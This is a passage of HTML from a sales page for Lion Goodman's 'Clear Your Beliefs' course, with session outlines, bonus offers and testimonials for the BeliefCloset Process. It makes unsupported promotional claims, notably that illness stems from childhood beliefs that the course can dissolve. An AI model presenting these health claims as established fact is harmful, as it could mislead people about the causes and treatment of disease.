programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" 